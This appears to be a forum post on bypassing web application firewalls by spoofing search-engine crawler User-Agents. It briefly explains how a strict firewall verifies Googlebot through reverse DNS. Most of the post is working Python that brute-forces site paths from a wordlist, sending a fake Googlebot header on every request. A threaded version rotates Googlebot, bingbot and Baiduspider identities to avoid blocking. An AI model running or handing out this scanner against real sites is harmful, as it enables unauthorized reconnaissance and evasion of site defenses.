Crawler whitelisting: many WAFs whitelist search-engine crawlers, which is especially useful when scanning — spoof a crawler's User-Agent to bypass detection.
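Why this works: Google documents that a real Googlebot should be verified by reverse DNS on the client IP (the hostname must end in googlebot.com or google.com and forward-resolve back to the same IP), but many WAF whitelists only string-match the User-Agent, which any client can set freely. A minimal sketch of the check a strict WAF would run (the sample IP is assumed to sit in Googlebot's published crawl range):

# Sketch of proper Googlebot verification via reverse + forward DNS.
# A WAF that only string-matches the User-Agent skips this entirely,
# which is exactly why UA spoofing bypasses it.
import socket

def is_real_googlebot(client_ip):
    try:
        hostname, _, _ = socket.gethostbyaddr(client_ip)  # reverse DNS
    except socket.herror:
        return False
    if not hostname.endswith((".googlebot.com", ".google.com")):
        return False
    try:
        # forward-confirm: the hostname must resolve back to the same IP
        return socket.gethostbyname(hostname) == client_ip
    except socket.gaierror:
        return False

print(is_real_googlebot("66.249.66.1"))  # assumed: an IP in Googlebot's range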
I wrote my own example code for this (is there a tool that supports it out of the box???). Here's the example:
#coding: utf-8
import requests

headers = {
    # Baiduspider's published UA also works against WAFs that whitelist Baidu's crawler:
    #'User-Agent': "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
    'User-Agent': "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
}

domain = "http://XXX.com/"

# Brute-force paths from the wordlist, sending the spoofed crawler UA on every request
with open("dicc.txt") as f:
    for line in f:
        path = line.strip()
        url = domain + path
        res = requests.get(url=url, headers=headers, timeout=10)
        status = res.status_code
        print("url:{} status:{}".format(url, status))
        # print("response: ", res.text)
        # break
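If the target blocks one crawler UA, rotating through several whitelisted crawler UAs and threading the requests can help. A minimal sketch under assumptions not in the original post: the bingbot and Baiduspider strings are those crawlers' published UAs, and the thread count and timeout are arbitrary choices.

#coding: utf-8
import requests
from concurrent.futures import ThreadPoolExecutor

CRAWLER_UAS = [
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
]

domain = "http://XXX.com/"

def probe(args):
    i, path = args
    # pick a crawler UA round-robin by wordlist index (no shared mutable state)
    headers = {'User-Agent': CRAWLER_UAS[i % len(CRAWLER_UAS)]}
    url = domain + path
    try:
        res = requests.get(url, headers=headers, timeout=10)
        print("url:{} status:{}".format(url, res.status_code))
    except requests.RequestException as e:
        print("url:{} error:{}".format(url, e))

with open("dicc.txt") as f:
    paths = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=8) as pool:
    pool.map(probe, enumerate(paths))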